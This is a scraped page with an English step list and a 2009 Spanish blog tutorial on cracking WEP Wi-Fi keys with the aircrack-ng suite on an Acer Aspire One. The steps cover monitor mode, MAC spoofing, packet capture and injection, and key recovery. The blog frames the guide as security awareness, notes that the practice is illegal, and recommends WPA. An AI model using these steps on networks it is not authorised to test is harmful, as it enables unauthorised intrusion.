Está en la página 1de 5

1: load slitaz

2: login as root
3: startx
4: open terminal
5: run startaaoath0
6: airmon-ng
7: airmon-ng stop ath0
8: ifconfig wifi0 down
9: macchanger --mac (anymac) wifi0
10: airmon-ng start wifi0 (channel)
11: iwconfig
12: airodump-ng ath0
13: airodump-ng -c (channel) -w (file) --bssid (bssid) ath0
open a new terminal, keeping the old one running and type:
14: aireplay-ng -1 0 -a (bssid) -h (anymac) -e (bssidinascii) ath0
15: aireplay-ng -3 -b (bssid) -h (anymac) ath0
once the IVs have been captured and #Data on the first terminal exceeds
20000. open a new terminal and type:
16: aircrack-ng -n 64 -b (bssid) file-01.cap
This will then display the wep key, this is all thats required to crack a
basic WEP network on the acer aspire one netbook.

have fun!

Reventar passwords WEP con un


Acer Aspire One
July 8th, 2009 Escrito por carlitos 2 comentarioss
WEP es un [poco seguro] sistema de cifrado usado en muchas redes Wi-Fi
domésticas de España. Suele ser el método por defecto en la mayoría de
routers de las grandes operadoras, lo que facilita su gran uso a pesar de su
inseguridad.

Obtener la contraseña de una red Wi-Fi encriptada con WEP es fácil y está
ampliamente documentado, así que, de hecho, no vamos a explicar nada
nuevo. Sin embargo, estos días hemos estado haciendo algunas pruebas con
un Acer Aspire One y dada la popularidad de este ordenador hemos
pensado que podía ser interesante explicar cómo lo hemos hecho.

Aclarar que se explica sobre todo para que toméis conciencia de lo fácil
que es reventar la Wi-Fi que tenéis en casa y que, naturalmente, es ilegal
acceder a redes ajenas sin autorización. Nosotros las pruebas las hemos
hecho con la red de la oficina, a la que, evidentemente, ya teníamos acceso.

No cualquier ordenador puede ser usado para obtener una contraseña WEP:
es necesaria una tarjeta de red capaz de actuar en modo monitor y no todas
lo permiten. Precisamente la de nuestro Acer Aspire One sí permite
hacerlo, así que es este ordenador con el que hemos hecho las pruebas. No
todos los netbooks ni portátiles disponen de una tarjeta así. De hecho, es
probable que corran por ahí Aspire Ones que no lo permitan. Pero nada os
impide hacer el experimento con el primer ordenador Wi-Fi que tengáis a
mano.

Para hacer nuestras pruebas nos basamos en el post How to Crack a Wi-Fi
Network’s WEP Password with BackTrack de Lifehacker, que seguramente
sea una mejor opción para quien no tenga problemas con el inglés.

El primer paso es bajarse la distribución BackTrack 3 (dedicada


especialmente a aquellos que quieran dedicarse a los “test de penetración”)
e instalarla en un drive USB. Se puede hacer de diversas maneras, nosotros
hemos usado UNetbootin, desde donde puedes seleccionar directamente la
distribución que te interesa e instalarla en un USB de arranque (de hecho,
Unetbootin permite hacer eso mismo con docenas de distribuciones, con lo
que es una herramienta muy práctica).

Una vez tenemos el USB con BackTrack 3 conectado al portátil lo


ponemos en marcha y pulsamos F12 para seleccionar el arranque a partir
del USB.
Cuando arranca BackTrack es importante seleccionar la opción de arranque
con VESA, porque si no no se cargará el entorno gráfico que vamos a
necesitar dentro de un rato…

Una vez tenemos el entorno de ventanas abierto, debemos abrir un terminal


y ejecutar las siguientes instrucciones (ojo, son específicas para el Acer
Aspire One):

airmon-ng stop ath0ifconfig wifi0 downmacchanger


--mac 00:11:22:33:44:55 wifi0airmon-ng start wifi0
airodump-ng ath0

Descargar este conjunto de instrucciones en un script.

Con todo esto lo que estamos haciendo es poner la tarjeta de red en modo
monitor y arrancando una aplicación que nos permite ver qué redes
tenemos a nuestro alcance (las partes específicas son el ath0 y el wifi0:
con otros portátiles puede que haya que cambiarlos por otros valores…).

Llegado a este punto, en la ventana que tenemos abierta aparecerán todas


las redes accesibles con, entre otros (listo sólo los más importantes) los
siguientes datos:

BSSID
la dirección mac del router
PWR
la potencia de la señal
#Data
que nos indica si tiene transmisión de datos
CH
el canal
ENC
el tipo de encriptación
ESSID
el nombre de la red
Con esa información podemos seleccionar cualquier red “asegurada” con
WEP. Cuando tengamos claro qué red queremos, hacemos un CTRL+C,
copiamos la dirección BSSID y escribimos lo siguiente:

airodump-ng -c CH -w nombre_archivo --bssid BSSID


ath0

Descargar esta instrucción en un script.

Donde CH es el canal y BSSID es la dirección MAC, los dos datos


obtenidos de la aplicación anterior. Los datos que obtenga se guardarán en
un archivo con el nombre nombre_archivo. Este programa se dedicará
a capturar paquetes y guardarlos en el archivo, lo cual nos permitirá, más
adelante, obtener la clave. Podremos ver cuántos paquetes ha obtenido en la
columna #Data.

Pero para poder conseguir la clave necesitamos un mínimo de 10.000


paquetes y eso puede tardar mucho en conseguirse, así que el siguiente
paso es forzar al router a enviar paquetes.

Esto lo haremos en una nueva ventana de terminal. Así, sin dejar de correr
el airodump-ng, y en una nueva ventana, ejecutaremos lo siguiente:

aireplay-ng -1 0 -a BSSID -h 00:11:22:33:44:55 -e


ESSID ath0aireplay-ng -3 -b BSSID -h
00:11:22:33:44:55 ath0

Descargar este conjunto de instrucciones en un script.

Donde BSSID y ESSID deben substituirse por sus valores


correspondientes.

La última instrucción genera tráfico, con lo que el contador de paquetes se


dispara y llega rápidamente a la cantidad necesaria. Ojo, a veces le puede
costar algo generar el tráfico, dependiendo de la potencia de la red y de si
tiene tráfico o no (si no tiene tráfico cuesta mucho más).

Finalmente, si todo ha ido bien, queda parar los programas (con CTRL+C)
y obtener la clave. Esto último se hace con la siguiente instrucción (que se
puede ejecutar en cualquiera de las dos ventanas):

aircrack-ng -b BSSID nombre_archivo


Descargar esta instrucción en un script.

Si todo va bien, aircrack-ng nos devolverá la clave de la red. Si va mal nos


informará de que ha fallado y que necesita más paquetes para reventar la
clave.
Como puede verse, no es nada complicado obtener la contraseña de una
Wi-Fi encriptada con WEP, con lo que vale la pena echarle un ojo al
manual de instrucciones de nuestro router y cambiar el estándar de
seguridad de WEP a WPA…

También podría gustarte